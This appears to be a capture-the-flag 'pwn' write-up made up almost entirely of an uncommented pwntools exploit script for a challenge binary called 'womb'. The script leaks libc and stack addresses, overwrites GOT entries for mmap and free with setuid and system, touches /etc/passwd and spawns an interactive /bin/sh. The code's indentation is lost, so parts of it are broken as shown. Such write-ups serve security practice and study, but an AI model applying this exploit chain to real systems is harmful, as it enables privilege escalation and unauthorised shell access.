Tags: pwn 

Rating:

```
from pwn import *
from time import sleep
e = ELF('./womb')
#p = process('./womb')
p = process(['bash','./connect.sh'],stdin=PTY)
sleep(2)
p.recv()
p.sendline('/wumb0list/wumb0list')
libc = ELF('./libc.so.6')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.timeout=1
def s(pl):
sleep(0.2)
p.sendline(str(pl))

s(2)
s(1)
#gdb.attach(p)
s(p64(e.got['printf'])+p64(e.bss(24))*3)
s(4)
s(10)
o = ''
while "\x7f" not in o:
o += p.recv()
leak = o[o.find('Enter list number: List')+24:o.find('Enter list number: List')+30].ljust(8,"\x00")
leak = u64(leak)
libc.address = leak-libc.symbols['printf']
log.success('libc base: '+hex(libc.address))
s(2)
s(0)
s(1)
s(p64(libc.symbols['environ'])+p64(e.bss(24))+p64(e.got['free']-16)+p64(e.bss(24)))
s(4)
s(10)
o = p.recv()
leak = o[o.find('Enter list number: List')+24:o.find('Enter list number: List')+30].ljust(8,"\x00")
stack = u64(leak)
log.success('stack leak: '+hex(stack))
#f = open('/proc/{}/maps'.format(p.pid),'rb').read()
#print f
s(2)
s(0)
s(1)
s(p64(libc.symbols['environ'])+p64(e.got['mmap']-16)+p64(e.bss(24))+p64(e.got['mmap']-16))
s(7)
s(10)
s(0x20272225ffffff)
s(libc.symbols['setuid'])
s(8)
s(1)
s(4)
s('/etc/passwd')
s(5)
s(2)
s(2)
s(0)
s(1)
s(p64(libc.symbols['environ'])+p64(e.got['free']-16)+p64(e.bss(24))+p64(e.got['free']-16))
s(7)
s(10)
s(8397322214375197000)
s(libc.symbols['system'])
#gdb.attach(p)
s(1)
s('/bin/sh')
s(2)
s(1)
#p.recv()
p.interactive()

```